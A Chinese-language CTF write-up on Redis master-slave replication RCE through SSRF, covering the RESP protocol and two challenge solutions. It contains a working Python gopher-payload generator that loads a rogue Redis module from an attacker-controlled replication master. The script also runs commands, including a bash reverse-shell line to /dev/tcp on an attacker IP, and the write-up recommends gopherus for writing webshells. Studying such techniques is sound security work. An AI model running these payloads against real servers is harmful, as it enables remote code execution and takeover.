redis 主从复制 rce 和 题目复现

0x01 RESP 协议

redis 客户端和服务端之间采用RESP 协议来通信，RESP 协议全称 REdis Serialization Protocol
理解 Redis 的 RESP 协议


搞清RESP 协议，就可以看懂 redis-rogue-server.py 中是怎么构造协议的了，以及怎么把redis 客户端命令转化成 通信时的 数据了

0x02 主从复制 中的FULLRESYNC （全局同步）：

贴一篇文章，讲到很详细：Redis 全量同步解析

也就是说master 回复 +FULLRESYNC ，接着就把发送RDB 文件给 slave
看看redis-rogue-server.py源代码 中也正是利用这点，把原来需要发送的RDB 替换成了evil.so :

意思就是 本来FULLERSYNC 中, master 是要发送master 的rdb 文件给slave 的，但是通过脚本的修改，发送evil.so 的内容给slave 了
这样一来，master 就通过FULLERSYNC 来将evil.so 文件传到了slave

0x03 题目复现：

1.网鼎杯2020 玄武组 SSRFME:

本题在buu 上复现，首先进入题目，利用http://0.0.0.0/hint.php 绕过check_inner_ip() 函数的检测
发现提示 redis 的密码 为 root , 使用dict 协议尝试 一下

http://6192276e-39e6-4716-859a-e0ca5bff94ac.node3.buuoj.cn/?url=dict://0.0.0.0:6379/AUTH%3Aroot 认证
认证正确

利用小号开启buu 的一个linux 主机，因为buu 的 内网 linux 主机没法直接联网下载文件，所以使用ssh 上传本地下载好的redis-rogue-server 脚本 开启 server

然后使用构造gopher 协议的脚本
自己结合网上的脚本改进了，贴出脚本:

# 使用方法就是分三次生成payload （dirty hack ，打开每次cmd 里面的注释）。
from urllib.parse import quote

def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x))) + CRLF + x
    cmd += CRLF
    return cmd


def generate_rce(lhost, lport, passwd, command="cat /etc/passwd"):
    exp_filename = "exp.so"
    cmd = [
    	# 第一次
        # "CONFIG SET dir /tmp/",
        # "config set dbfilename exp.so",
        # "SLAVEOF {} {}".format(lhost, lport),

		# 第二次
        # "MODULE LOAD /tmp/exp.so",
		
		# 第三次	
        "system.exec {}".format(command.replace(" ", "${IFS}")),
		# 这里有个细节就是使用${IFS}代替参数中的空格，因为上面的redis_format函数会根据空格来进行分割命令和参数

        # "system.rev 174.2.6.11${IFS}2333",
        # "SLAVEOF NO ONE",
        # "CONFIG SET dbfilename dump.rdb",
        # "system.exec rm${IFS}/tmp/{}".format(exp_filename),
        # "MODULE UNLOAD system",
        "quit",

    ]
    if passwd:
        cmd.insert(0, "AUTH {}".format(passwd))
    return cmd


if __name__ == '__main__':
    #攻击机ip:
    lhost =  "174.2.6.11"
    lport = "21000"
    passwd = "root"
    command = "cat /flag"
    # command = "bash -i >& /dev/tcp/174.2.6.11/2333 0>&1"
    cmd = generate_rce(lhost,lport,passwd,command)

    rhost = "0.0.0.0"
    rport = "6379"

    payload = 'gopher://'+rhost+":"+rport+"/_"
    a = ""

    for x in cmd:
        a += redis_format(x)
        payload += quote(redis_format(x))

    print(a)
    print(payload)

第一次paylod :

第二次payload:

第三次payload:

还需要注意的一点是由于题目中还使用了curl ,所以需要对payload 进行二次url 编码，这个利用hackbar 可以很方便的操作

但是buu 的环境 我反弹shell 没有成功，使用system.rev 命令或者 system.exec 加反弹shell 命令 都没有反弹成功。也不知道什么原因，但是system.exec 确实可以执行命令，然后执行cat /flag 就可以得到flag 了

2.GKCTF EZ三剑客-EzWeb (正好是一起做的 ，虽然没用到主从复制但是也和redis rec 以及 ssrf 有关)

同样在buu 复现
首先进入题目，查看源代码，访问?secret

返回的是ifconfig 的结果，然后输入框中又提示 输入url ，很敏感，想到ssrf,然后通过结果 返回173.211.241.10 ,用burp 跑一下，得到173.211.241.11

那就接着跑端口，发现6379端口是开发的

推荐一款 gopher 协议利用工具 gopherus，非常好用，直接使用 gopherus 工具，直接生成webshell , 对了，直接在windows 下运行会出现乱码，修改gopherus.py ，在开头增加 :

import colorama
from colorama import init,Fore,Back,Style
init(autoreset=True)

即可解决乱码问题

把payload 放到url 处，然后再访问 http://173.211.241.11/shell.php 即可得到flag

题目作者的wp : GKCTF-EzWeb+redis未授权访问 , 里面提到一嘴，如果使用dict 协议来直接写webshell 可能会导致乱码或者写入失败，这个时候可以使用主从复制，在master 上面写shell ,然后通过主从复制，写入到slave 中。这个小 tips 可以记住